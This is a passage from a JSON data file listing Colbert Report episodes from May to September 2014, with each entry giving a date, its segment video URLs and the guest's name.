    },
    {
      "date": "2014-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/798k8c/-watters--world-",
        "http://thecolbertreport.cc.com/videos/1e524e/-watters--world----tad-s-turf",
        "http://thecolbertreport.cc.com/videos/zbjl95/cnn-s-endless-wait-for-flight-370-news",
        "http://thecolbertreport.cc.com/videos/hji3d3/saul-williams",
        "http://thecolbertreport.cc.com/videos/ie7s2m/saul-williams----amethyst-rocks-"
      ],
      "guest": "Saul Williams"
    },
    {
      "date": "2014-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/unhuhc/intro---5-5-14",
        "http://thecolbertreport.cc.com/videos/oxvwlw/nancy-pelosi-s-cinco-de-mayo-celebration",
        "http://thecolbertreport.cc.com/videos/0hu2aq/better-know-a-district---virginia-s-3rd",
        "http://thecolbertreport.cc.com/videos/fo52kn/kareem-abdul-jabbar-on-racism-and-ghosts",
        "http://thecolbertreport.cc.com/videos/c0s4ec/edward-o--wilson",
        "http://thecolbertreport.cc.com/videos/4tegd5/sign-off---goodnight"
      ],
      "guest": "Edward O. Wilson"
    },
    {
      "date": "2014-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pnqv06/intro---5-6-14",
        "http://thecolbertreport.cc.com/videos/khlwzq/rand-paul-s-derby-date-with-rupert-murdoch",
        "http://thecolbertreport.cc.com/videos/s4me1v/nra-annual-meeting---guns-everywhere-in-georgia",
        "http://thecolbertreport.cc.com/videos/zekn1k/satanic-monument-for-the-oklahoma-state-house",
        "http://thecolbertreport.cc.com/videos/iihdkg/bette-midler",
        "http://thecolbertreport.cc.com/videos/n572qd/sign-off---nightcap"
      ],
      "guest": "Bette Midler"
    },
    {
      "date": "2014-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1ztozi/intro---5-7-14",
        "http://thecolbertreport.cc.com/videos/p4t1a2/vibrant-constipation-pill",
        "http://thecolbertreport.cc.com/videos/ywt77c/tip-wag---herald-embroidery--bug-scientists---dana-perino",
        "http://thecolbertreport.cc.com/videos/2u61x6/ukraine-in-the-membrane",
        "http://thecolbertreport.cc.com/videos/uz2nio/david-remnick",
        "http://thecolbertreport.cc.com/videos/q5zpsy/sign-off---goodnight"
      ],
      "guest": "David Remnick"
    },
    {
      "date": "2014-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84cvwk/exclusive---better-know-a-challenger---florida-s-3rd---jake-rush",
        "http://thecolbertreport.cc.com/videos/1u7a5d/vampire-for-congress-in-florida",
        "http://thecolbertreport.cc.com/videos/vkcose/better-know-a-challenger---florida-s-3rd---jake-rush",
        "http://thecolbertreport.cc.com/videos/8jno3s/stu-varney-among-the-common-people",
        "http://thecolbertreport.cc.com/videos/m2n3c9/ellen-page",
        "http://thecolbertreport.cc.com/videos/u05pdf/sign-off---spinning-top"
      ],
      "guest": "Ellen Page"
    },
    {
      "date": "2014-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nnz78u/michael-sam-s-nfl-draft-kiss",
        "http://thecolbertreport.cc.com/videos/g2hf60/stephen-colbert-s-bats--t-serious---monica-lewinsky-s-conveniently-timed-essay",
        "http://thecolbertreport.cc.com/videos/2j80wh/glenn-greenwald-pt--1",
        "http://thecolbertreport.cc.com/videos/31s76v/glenn-greenwald-pt--2",
        "http://thecolbertreport.cc.com/videos/xovmc1/sign-off---penalty-whistle"
      ],
      "guest": "Glenn Greenwald"
    },
    {
      "date": "2014-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wn13ym/pope-francis-s-crusade-against-capitalism",
        "http://thecolbertreport.cc.com/videos/vmje6p/-bringbackourgirls",
        "http://thecolbertreport.cc.com/videos/2rgt3x/-bringbackourgirls---rosemary-nyirumbe",
        "http://thecolbertreport.cc.com/videos/jrmo9v/koch-brothers-vs--the-columbus-zoo",
        "http://thecolbertreport.cc.com/videos/s46r2u/the-black-keys",
        "http://thecolbertreport.cc.com/videos/7bxzr7/sign-off---sisters-united-bags"
      ],
      "guest": "The Black Keys"
    },
    {
      "date": "2014-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mwq7dh/intro---5-14-14",
        "http://thecolbertreport.cc.com/videos/5ob1j2/pope-francis-on-baptizing-martians",
        "http://thecolbertreport.cc.com/videos/k6jlhl/the-word---f--k-it",
        "http://thecolbertreport.cc.com/videos/4a4ahs/amazon-s-audacious-photography-patent",
        "http://thecolbertreport.cc.com/videos/hffa7o/keri-russell",
        "http://thecolbertreport.cc.com/videos/2b3fgm/sign-off---goodnight"
      ],
      "guest": "Keri Russell"
    },
    {
      "date": "2014-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bvzi2n/vladimir-putin-s-space-station-ban",
        "http://thecolbertreport.cc.com/videos/pb1byh/karl-rove-on-hillary-clinton-s-health",
        "http://thecolbertreport.cc.com/videos/o2wt62/morality-lessons-for-robots",
        "http://thecolbertreport.cc.com/videos/lmgmhg/thomas-friedman",
        "http://thecolbertreport.cc.com/videos/z8ndeb/sign-off---mirror"
      ],
      "guest": "Thomas Friedman"
    },
    {
      "date": "2014-05-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r5l7zc/intro---5-19-14",
        "http://thecolbertreport.cc.com/videos/el90zp/co-ed-lab-rats",
        "http://thecolbertreport.cc.com/videos/7oum5k/elizabeth-warren-vs--wall-street",
        "http://thecolbertreport.cc.com/videos/7sujj3/colbert-report-consumer-alert---jerky-blaster",
        "http://thecolbertreport.cc.com/videos/79q9bs/elizabeth-warren",
        "http://thecolbertreport.cc.com/videos/igbz3e/sign-off---goodnight"
      ],
      "guest": "Elizabeth Warren"
    },
    {
      "date": "2014-05-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oimxrw/china-s-cyber-spies",
        "http://thecolbertreport.cc.com/videos/zfayee/the-gop-s-gloves-off-approach-to-hillary-clinton",
        "http://thecolbertreport.cc.com/videos/dbim9j/google-and-the-right-to-be-forgotten",
        "http://thecolbertreport.cc.com/videos/zopbx2/matthew-weiner",
        "http://thecolbertreport.cc.com/videos/g4ax73/sign-off---goodbye-kiss"
      ],
      "guest": "Matt Weiner"
    },
    {
      "date": "2014-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6uijkp/tea-party-defeat-in-the-gop-primaries",
        "http://thecolbertreport.cc.com/videos/sk5fyk/idaho-s-bizarre-gubernatorial-debate",
        "http://thecolbertreport.cc.com/videos/zn3est/mers-virus-in-america",
        "http://thecolbertreport.cc.com/videos/xnk3xl/patrick-stewart",
        "http://thecolbertreport.cc.com/videos/8pgnos/sign-off---goodnight"
      ],
      "guest": "Patrick Stewart"
    },
    {
      "date": "2014-05-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7q56w3/intro---5-22-14",
        "http://thecolbertreport.cc.com/videos/ouzxbu/va-hospital-outrage",
        "http://thecolbertreport.cc.com/videos/s6rmi7/va-hospital-outrage---paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/74fcac/marco-rubio-s-hazy-marijuana-history",
        "http://thecolbertreport.cc.com/videos/b40eb0/ray-mabus",
        "http://thecolbertreport.cc.com/videos/764wvl/sign-off---goodnight-and-good-week"
      ],
      "guest": "Ray Mabus"
    },
    {
      "date": "2014-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xtbsgf/obama-s-prisoner-exchange-with-the-taliban",
        "http://thecolbertreport.cc.com/videos/i8fthl/difference-makers---doug-varrieur",
        "http://thecolbertreport.cc.com/videos/oq97o4/thomas-piketty-vs--billionaire-heroes",
        "http://thecolbertreport.cc.com/videos/e301vf/thomas-piketty",
        "http://thecolbertreport.cc.com/videos/lyrlrc/sign-off---goatee"
      ],
      "guest": "Thomas Piketty"
    },
    {
      "date": "2014-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o4pou7/intro---6-3-14",
        "http://thecolbertreport.cc.com/videos/u6nqsd/open-carry-backlash",
        "http://thecolbertreport.cc.com/videos/57iigb/obama-s-global-warming-initiative",
        "http://thecolbertreport.cc.com/videos/ifxi76/obama-s-global-warming-initiative---dan-esty",
        "http://thecolbertreport.cc.com/videos/vf38fj/medicare-coverage-for-sex-change-surgery",
        "http://thecolbertreport.cc.com/videos/ttwu42/morgan-freeman",
        "http://thecolbertreport.cc.com/videos/qmezm2/sign-off---goodnight"
      ],
      "guest": "Morgan Freeman"
    },
    {
      "date": "2014-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yuxdmx/the-perils-of-girly-hurricanes",
        "http://thecolbertreport.cc.com/videos/ukf9gv/amazon-vs--hachette",
        "http://thecolbertreport.cc.com/videos/t1nxwu/amazon-vs--hachette---sherman-alexie",
        "http://thecolbertreport.cc.com/videos/w5wvxu/the-colbert-report-s-unintended-educational-value",
        "http://thecolbertreport.cc.com/videos/olnbg3/jonah-hill",
        "http://thecolbertreport.cc.com/videos/k89vi0/sign-off----california-"
      ],
      "guest": "Jonah Hill"
    },
    {
      "date": "2014-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7fyrr9/intro---6-5-14",
        "http://thecolbertreport.cc.com/videos/hfogr3/bergdghazi",
        "http://thecolbertreport.cc.com/videos/2408x6/sport-report---mushroom-sports-drink--nfl-pill-pushers---rio-de-janeiro-s-olympic-problems",
        "http://thecolbertreport.cc.com/videos/q8dzb2/the-drudge-report-on-hillary-clinton-s--walker-",
        "http://thecolbertreport.cc.com/videos/muek3m/chrissie-hynde"
      ],
      "guest": "Chrissie Hynde"
    },
    {
      "date": "2014-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tpxhoo/scott-fistler-s--cesar-chavez--strategy",
        "http://thecolbertreport.cc.com/videos/7uozsl/fox-news-s-war-on-bowe-bergdahl",
        "http://thecolbertreport.cc.com/videos/uyh5xo/craziest-f--king-thing-i-ve-ever-heard---vincent-van-gogh-s-reanimated-ear",
        "http://thecolbertreport.cc.com/videos/allxmi/esther-perel",
        "http://thecolbertreport.cc.com/videos/x78nyg/sign-off---goodnight"
      ],
      "guest": "Esther Perel"
    },
    {
      "date": "2014-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gdbreq/turing-test-breakthrough",
        "http://thecolbertreport.cc.com/videos/p8wqsa/the-enemy-within---bina-the-activist-android",
        "http://thecolbertreport.cc.com/videos/n30nzb/sport-report---swimming-pools-for-football-fans---governors--hockey-wager",
        "http://thecolbertreport.cc.com/videos/2lc1uv/john-waters",
        "http://thecolbertreport.cc.com/videos/dxz774/sign-off---goodnight"
      ],
      "guest": "John Waters"
    },
    {
      "date": "2014-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8uwwo/intro---6-11-14",
        "http://thecolbertreport.cc.com/videos/1d3kl4/eric-cantor-s-shocking-defeat",
        "http://thecolbertreport.cc.com/videos/m87g43/the-word---debt-or-prison",
        "http://thecolbertreport.cc.com/videos/2kgoki/rob-rhinehart",
        "http://thecolbertreport.cc.com/videos/6v0f1z/sign-off---spiked-drink"
      ],
      "guest": "Rob Rhinehart"
    },
    {
      "date": "2014-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iywdca/amazon-s-scorched-earth-tactics-and-edan-lepucki-s--california-",
        "http://thecolbertreport.cc.com/videos/4n51kp/tip-wag---ted-cruz---led-zeppelin",
        "http://thecolbertreport.cc.com/videos/0z44gm/sport-report---team-usa-vs--the-group-of-death---hans-beinholtz-on-the-world-cup",
        "http://thecolbertreport.cc.com/videos/sqbqhw/james-webb",
        "http://thecolbertreport.cc.com/videos/pjws58/sign-off---necktie"
      ],
      "guest": "James Webb"
    },
    {
      "date": "2014-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6mpwy3/isis-militants-in-iraq",
        "http://thecolbertreport.cc.com/videos/wlnavl/isis-militants-in-iraq---ben-van-heuvelen",
        "http://thecolbertreport.cc.com/videos/eozrlj/racial-perceptions-and-economic-stress",
        "http://thecolbertreport.cc.com/videos/n3etz1/ta-nehisi-coates",
        "http://thecolbertreport.cc.com/videos/200z2y/sign-off---hand-mirror"
      ],
      "guest": "Ta-Nehisi Coates"
    },
    {
      "date": "2014-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ddo89r/world-cup-victory-for-team-usa",
        "http://thecolbertreport.cc.com/videos/xoa360/the-word---a-darker-shade-of-pale",
        "http://thecolbertreport.cc.com/videos/qpaogb/majority-support-for-same-sex-marriage",
        "http://thecolbertreport.cc.com/videos/8buw4s/david-boies---theodore-b--olson",
        "http://thecolbertreport.cc.com/videos/4gkwgg/sign-off---foam-finger"
      ],
      "guest": "David Boies & Theodore B. Olson"
    },
    {
      "date": "2014-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/exebzv/intro---6-18-14",
        "http://thecolbertreport.cc.com/videos/hgs925/arrest-of-benghazi-terror-mastermind",
        "http://thecolbertreport.cc.com/videos/a1yfmv/hillary-clinton-vs--the-rnc-squirrel",
        "http://thecolbertreport.cc.com/videos/qj2x93/thad-cochran-on-doing-indecent-things-with-animals",
        "http://thecolbertreport.cc.com/videos/3ul9zn/katty-kay---claire-shipman",
        "http://thecolbertreport.cc.com/videos/och071/sign-off---goodnight"
      ],
      "guest": "Katty Kay & Claire Shipman"
    },
    {
      "date": "2014-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gt99v3/the-iraq-pack",
        "http://thecolbertreport.cc.com/videos/445utq/thought-for-food---domino-s-smart-slice---doritos-jacked",
        "http://thecolbertreport.cc.com/videos/cbr3yz/-yo--smartphone-app",
        "http://thecolbertreport.cc.com/videos/3abzv4/jay-carney",
        "http://thecolbertreport.cc.com/videos/h0b8ou/sign-off---goodnight"
      ],
      "guest": "Jay Carney"
    },
    {
      "date": "2014-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7bqhfd/team-usa-s-tragic-tie-with-portugal",
        "http://thecolbertreport.cc.com/videos/k8orr2/obama-s-response-to-isis-in-iraq---mark-mazzetti",
        "http://thecolbertreport.cc.com/videos/72elnv/jeremy-meeks-s-handsome-mug-shot",
        "http://thecolbertreport.cc.com/videos/07oysy/john-green",
        "http://thecolbertreport.cc.com/videos/mwnvtk/sign-off---goodnight"
      ],
      "guest": "John Green"
    },
    {
      "date": "2014-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tmjbzp/intro---6-24-14",
        "http://thecolbertreport.cc.com/videos/ee0zj7/isis-invades-hashtagistan",
        "http://thecolbertreport.cc.com/videos/bveu0w/tip-wag---fda---ben---jerry-s",
        "http://thecolbertreport.cc.com/videos/bu43e8/new-york-s-ban-on-tiger-selfies",
        "http://thecolbertreport.cc.com/videos/bo739z/edie-falco",
        "http://thecolbertreport.cc.com/videos/hgf6rh/sign-off---goodnight"
      ],
      "guest": "Edie Falco"
    },
    {
      "date": "2014-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpnj8s/obama-s-chipotle-blunder",
        "http://thecolbertreport.cc.com/videos/glsyx9/stephen-colbert-s-bats--t-serious---child-immigrant-intrigue",
        "http://thecolbertreport.cc.com/videos/nx3ix1/stephen-colbert-s-bats--t-serious---child-immigrant-intrigue---john-burnett",
        "http://thecolbertreport.cc.com/videos/rki77c/primary-victory-for-thad-cochran",
        "http://thecolbertreport.cc.com/videos/rn2gd8/eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/q6den3/sign-off---goodnight"
      ],
      "guest": "Rep. Eleanor Holmes Norton"
    },
    {
      "date": "2014-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/suqg0f/stephen-colbert-s-bats--t-serious---the-vast-government-soccer-conspiracy",
        "http://thecolbertreport.cc.com/videos/autzis/tip-wag---north-carolina-state-legislature---cereal-manufacturers",
        "http://thecolbertreport.cc.com/videos/jrdas9/paul-rudd-pt--1",
        "http://thecolbertreport.cc.com/videos/rb9bo7/paul-rudd-pt--2",
        "http://thecolbertreport.cc.com/videos/8vp2bp/sign-off---so-long-for-two-weeks"
      ],
      "guest": "Paul Rudd"
    },
    {
      "date": "2014-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fy2b19/intro---7-14-14",
        "http://thecolbertreport.cc.com/videos/9cspva/world-cup-recap",
        "http://thecolbertreport.cc.com/videos/mlyvqh/thank-you--racism---boehner-v--obama",
        "http://thecolbertreport.cc.com/videos/xivy3m/hobby-lobby-case",
        "http://thecolbertreport.cc.com/videos/9nzwjt/vessyl-digital-cup",
        "http://thecolbertreport.cc.com/videos/6cvwe6/jad-abumrad---robert-krulwich",
        "http://thecolbertreport.cc.com/videos/rpfaco/sign-off---goodnight"
      ],
      "guest": "Jad Abumrad, Robert Krulwich"
    },
    {
      "date": "2014-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nnucn6/obama-s-senioritis",
        "http://thecolbertreport.cc.com/videos/f0uh68/threatdown---all-bear-edition",
        "http://thecolbertreport.cc.com/videos/08a2dg/vint-cerf-pt--1",
        "http://thecolbertreport.cc.com/videos/x9hnxr/vint-cerf-pt--2",
        "http://thecolbertreport.cc.com/videos/dixoxg/sign-off---goodnight"
      ],
      "guest": "Vint Cerf"
    },
    {
      "date": "2014-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/anklfa/intro---7-16-14",
        "http://thecolbertreport.cc.com/videos/53n0nf/conservative-contempt-for-bill-de-blasio",
        "http://thecolbertreport.cc.com/videos/cbs1n7/rick-perry-s-makeover---uncensored",
        "http://thecolbertreport.cc.com/videos/1flr4c/filling-captain-america-s-shoes---joe-quesada",
        "http://thecolbertreport.cc.com/videos/ypm476/bill-de-blasio",
        "http://thecolbertreport.cc.com/videos/slmbh6/sign-off----captain-america-"
      ],
      "guest": "Mayor Bill de Blasio"
    },
    {
      "date": "2014-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ket4ms/malaysia-airlines-crash---hamas-israel-violence",
        "http://thecolbertreport.cc.com/videos/z3gi0q/questionable-compassion-for-child-immigrants",
        "http://thecolbertreport.cc.com/videos/bfvmgh/coal-rolling",
        "http://thecolbertreport.cc.com/videos/70ezhu/steven-m--wise",
        "http://thecolbertreport.cc.com/videos/n00bpi/sign-off---soot-blast"
      ],
      "guest": "Steven Wise"
    },
    {
      "date": "2014-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qimhj6/intro---7-21-14",
        "http://thecolbertreport.cc.com/videos/n71mkf/world-news-wrap-up",
        "http://thecolbertreport.cc.com/videos/8e5dyu/colbert-nation-vs--amazon---edan-lepucki",
        "http://thecolbertreport.cc.com/videos/egw3ua/nancy-pelosi-pt--1",
        "http://thecolbertreport.cc.com/videos/q8mj7b/nancy-pelosi-pt--2",
        "http://thecolbertreport.cc.com/videos/98szje/sign-off----sweetness--9-"
      ],
      "guest": "Rep. Nancy Pelosi"
    },
    {
      "date": "2014-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6s2qu/rep--steve-pearce-s-fact-finding-mission-in-central-america",
        "http://thecolbertreport.cc.com/videos/d24npe/rising-calls-for-obama-s-impeachment",
        "http://thecolbertreport.cc.com/videos/stx9ln/rising-calls-for-obama-s-impeachment---p-k--winsome",
        "http://thecolbertreport.cc.com/videos/qf023x/rory-mcilroy-and-caroline-wozniacki-s-post-breakup-triumph",
        "http://thecolbertreport.cc.com/videos/1872w0/julia-ioffe",
        "http://thecolbertreport.cc.com/videos/rxjlpc/sign-off---p-k--winsome"
      ],
      "guest": "Julia Ioffe"
    },
    {
      "date": "2014-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/74ly7x/housing-crisis-for-child-immigrants",
        "http://thecolbertreport.cc.com/videos/w0dhco/six-californias",
        "http://thecolbertreport.cc.com/videos/rmgh1u/six-californias---tim-draper",
        "http://thecolbertreport.cc.com/videos/qb2d4f/lowe-s-vs--veterans-affairs",
        "http://thecolbertreport.cc.com/videos/a368r9/mary-mazzio---oscar-vazquez",
        "http://thecolbertreport.cc.com/videos/8nsg9g/sign-off---goodnight"
      ],
      "guest": "Mary Mazzio, Oscar Vazquez"
    },
    {
      "date": "2014-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9bfzta/darth-vader-for-president",
        "http://thecolbertreport.cc.com/videos/br4k5m/tip-wag----true-blood----washington--d-c---court-of-appeals",
        "http://thecolbertreport.cc.com/videos/o26y1r/elon-musk-pt--1",
        "http://thecolbertreport.cc.com/videos/s4aaoq/elon-musk-pt--2",
        "http://thecolbertreport.cc.com/videos/baab8l/exclusive---elon-musk-discusses-mars",
        "http://thecolbertreport.cc.com/videos/9pmgk5/sign-off---goodnight"
      ],
      "guest": "Elon Musk"
    },
    {
      "date": "2014-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99fqm5/magical-afternoon-at-comic-con",
        "http://thecolbertreport.cc.com/videos/yxerhp/the-word---see-no-equal",
        "http://thecolbertreport.cc.com/videos/c8gyzb/-kim-kardashian--hollywood--game",
        "http://thecolbertreport.cc.com/videos/me3jxh/beck"
      ],
      "guest": "Beck"
    },
    {
      "date": "2014-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/go3xsz/stephen-colbert-s-i-need-a-drink",
        "http://thecolbertreport.cc.com/videos/zo7j8y/the-sarah-palin-channel",
        "http://thecolbertreport.cc.com/videos/oeurov/jon-batiste-and-stay-human",
        "http://thecolbertreport.cc.com/videos/84mh53/sign-off---jon-batiste-and-stay-human"
      ],
      "guest": "Jon Batiste &amp; Stay Human"
    },
    {
      "date": "2014-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vy7myr/orlando-bloom-s-altercation-with-justin-bieber",
        "http://thecolbertreport.cc.com/videos/mfm78m/corporate-inversions",
        "http://thecolbertreport.cc.com/videos/gv7xvj/corporate-inversions---allan-sloan",
        "http://thecolbertreport.cc.com/videos/psbsuw/naked-tv",
        "http://thecolbertreport.cc.com/videos/lb70bp/james-franco",
        "http://thecolbertreport.cc.com/videos/n2673s/sign-off---goodnight"
      ],
      "guest": "James Franco"
    },
    {
      "date": "2014-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dwf82q/women-on-american-currency",
        "http://thecolbertreport.cc.com/videos/cruj3s/the-conflict-over-covering-the-conflict-in-gaza",
        "http://thecolbertreport.cc.com/videos/m4juon/tip-wag---beelzebub---nasa",
        "http://thecolbertreport.cc.com/videos/2mpwlv/campbell-brown",
        "http://thecolbertreport.cc.com/videos/26ag1q/sign-off---monitoring-system"
      ],
      "guest": "Campbell Brown"
    },
    {
      "date": "2014-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zcyj0l/40th-anniversary-of-nixon-s-resignation",
        "http://thecolbertreport.cc.com/videos/9hxmyy/a-nation-betrayed---a-fond-look-back---74",
        "http://thecolbertreport.cc.com/videos/c505xx/pat-buchanan",
        "http://thecolbertreport.cc.com/videos/ecplh0/john-w--dean",
        "http://thecolbertreport.cc.com/videos/jg7vda/sign-off---retrospectacular",
        "http://thecolbertreport.cc.com/videos/2kctj0/exclusive---pat-buchanan"
      ],
      "guest": "Pat Buchanan, John W. Dean"
    },
    {
      "date": "2014-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eu8j9u/open-carry-trailblazers",
        "http://thecolbertreport.cc.com/videos/imtefo/-hard-choices----hillary-clinton",
        "http://thecolbertreport.cc.com/videos/8tvtmw/language-lessons-from-america-s-senior-citizens",
        "http://thecolbertreport.cc.com/videos/wb06vr/james-cameron",
        "http://thecolbertreport.cc.com/videos/tovjr3/sign-off---goodnight"
      ],
      "guest": "James Cameron"
    },
    {
      "date": "2014-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v652g6/smile-file---kim-jong-un-at-the-lube-factory",
        "http://thecolbertreport.cc.com/videos/mrntln/rand-paul-s-hasty-exit",
        "http://thecolbertreport.cc.com/videos/82nvgq/news-anchor-baby",
        "http://thecolbertreport.cc.com/videos/gn8hz0/michael-fassbender"
      ],
      "guest": "Michael Fassbender"
    },
    {
      "date": "2014-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2mrfmc/intro---8-7-14",
        "http://thecolbertreport.cc.com/videos/bmd26v/vladimir-putin-s-food-sanctions",
        "http://thecolbertreport.cc.com/videos/nm2atj/ebola-panic",
        "http://thecolbertreport.cc.com/videos/7a9ir7/the-in-box---blt-vs--club",
        "http://thecolbertreport.cc.com/videos/ddvyto/brian-chesky",
        "http://thecolbertreport.cc.com/videos/dc3x0v/sign-off---bourbon-and-chicken"
      ],
      "guest": "Brian Chesky"
    },
    {
      "date": "2014-08-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xfa2tc/intro---8-26-14",
        "http://thecolbertreport.cc.com/videos/pupsy6/better-know-a-district---ohio-s-11th---marcia-fudge-pt--1",
        "http://thecolbertreport.cc.com/videos/llmmz6/better-know-a-district---ohio-s-11th---marcia-fudge-pt--2",
        "http://thecolbertreport.cc.com/videos/crpfrn/jeff-bridges---lois-lowry",
        "http://thecolbertreport.cc.com/videos/30umwt/sign-off---goodnight"
      ],
      "guest": "Jeff Bridges, Lois Lowry"
    },
    {
      "date": "2014-08-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/12kfzg/intro---8-27-14",
        "http://thecolbertreport.cc.com/videos/4komvc/outrage-in-ferguson",
        "http://thecolbertreport.cc.com/videos/h1itnw/outrage-in-ferguson---a-national-conversation-on-race",
        "http://thecolbertreport.cc.com/videos/8ye61k/scrabble-s-updated-dictionary",
        "http://thecolbertreport.cc.com/videos/v6x4qn/michael-sheen",
        "http://thecolbertreport.cc.com/videos/4g1qgo/sign-off---welcome-baby-eva-"
      ],
      "guest": "Michael Sheen"
    },
    {
      "date": "2014-08-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2x4lop/isis-panic",
        "http://thecolbertreport.cc.com/videos/yr7egy/isis-panic---announcing-reagan-s-return",
        "http://thecolbertreport.cc.com/videos/bac98y/vapshot-alcohol-vaporizer",
        "http://thecolbertreport.cc.com/videos/vmcz6o/jr",
        "http://thecolbertreport.cc.com/videos/q6o47f/sign-off---goodnight"
      ],
      "guest": "JR"
    },
    {
      "date": "2014-09-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7ohwx8/celebrity-nude-photo-scandal",
        "http://thecolbertreport.cc.com/videos/kc4ojp/police-militarization-in-america",
        "http://thecolbertreport.cc.com/videos/ukyqb3/police-militarization-in-america---norm-stamper",
        "http://thecolbertreport.cc.com/videos/xuzel5/good-news-for-sleep-deprived-teens",
        "http://thecolbertreport.cc.com/videos/sximkb/mandy-patinkin",
        "http://thecolbertreport.cc.com/videos/hpkdp0/sign-off---goodnight"
      ],
      "guest": "Mandy Patinkin"
    },
    {
      "date": "2014-09-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mrdb7o/intro---9-3-14",
        "http://thecolbertreport.cc.com/videos/v7c4zm/obama-s-isis-strategy",
        "http://thecolbertreport.cc.com/videos/2ccwew/obama-s-isis-strategy---frank-underwood",
        "http://thecolbertreport.cc.com/videos/r6svso/coach-class-conflicts",
        "http://thecolbertreport.cc.com/videos/ewijdy/randall-munroe",
        "http://thecolbertreport.cc.com/videos/cs2fnl/sign-off---goodnight"
      ],
      "guest": "Randall Munroe"
    },
    {
      "date": "2014-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/30z1ut/intro---9-4-14",
        "http://thecolbertreport.cc.com/videos/lo5wee/gays-in-the-st--patrick-s-day-parade",
        "http://thecolbertreport.cc.com/videos/zq72u5/the-midterm-round-up",
        "http://thecolbertreport.cc.com/videos/g7yyhh/al-qaeda-s-indian-franchise",
        "http://thecolbertreport.cc.com/videos/s4ds82/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/fj6l1s/sign-off---ship-christening"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2014-09-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g9wav3/intro---9-8-14",
        "http://thecolbertreport.cc.com/videos/dzxra6/william-and-kate-s-royal-pregnancy",
        "http://thecolbertreport.cc.com/videos/3160bg/waiting-forever-for-immigration-reform",
        "http://thecolbertreport.cc.com/videos/jz3rdd/pavlok-fitness-band",
        "http://thecolbertreport.cc.com/videos/23mu4v/john-lithgow",
        "http://thecolbertreport.cc.com/videos/a0x0bs/sign-off---goodnight"
      ],
      "guest": "John Lithgow"
    },
    {
      "date": "2014-09-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j5s4z1/apple-unveils-its-smartwatch",
        "http://thecolbertreport.cc.com/videos/s6gte9/the-midterm-round-up---the-gop-s-lady-problems",
        "http://thecolbertreport.cc.com/videos/hkfm7z/hometown-hero-town---detroit",
        "http://thecolbertreport.cc.com/videos/e4y7wx/jason-segel",
        "http://thecolbertreport.cc.com/videos/93zpki/sign-off---jason-segel-s-latest-award"
      ],
      "guest": "Jason Segel"
    },
    {
      "date": "2014-09-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u5vu07/intro---9-10-14",
        "http://thecolbertreport.cc.com/videos/p2b64y/obama-s-isis-speech",
        "http://thecolbertreport.cc.com/videos/lqm25y/dalai-lama-drama",
        "http://thecolbertreport.cc.com/videos/4pdz7v/tip-wag---nasa---trump-entertainment-resorts",
        "http://thecolbertreport.cc.com/videos/wn86jw/the-buypartisan-app",
        "http://thecolbertreport.cc.com/videos/hyx04c/henry-kissinger",
        "http://thecolbertreport.cc.com/videos/bipiaj/sign-off---goodnight"
      ],
      "guest": "Henry Kissinger"
    },
    {
      "date": "2014-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oeusg2/this-country-is-at-war-",
        "http://thecolbertreport.cc.com/videos/li99ni/republicans--predictions-of-the-iraq-crisis",
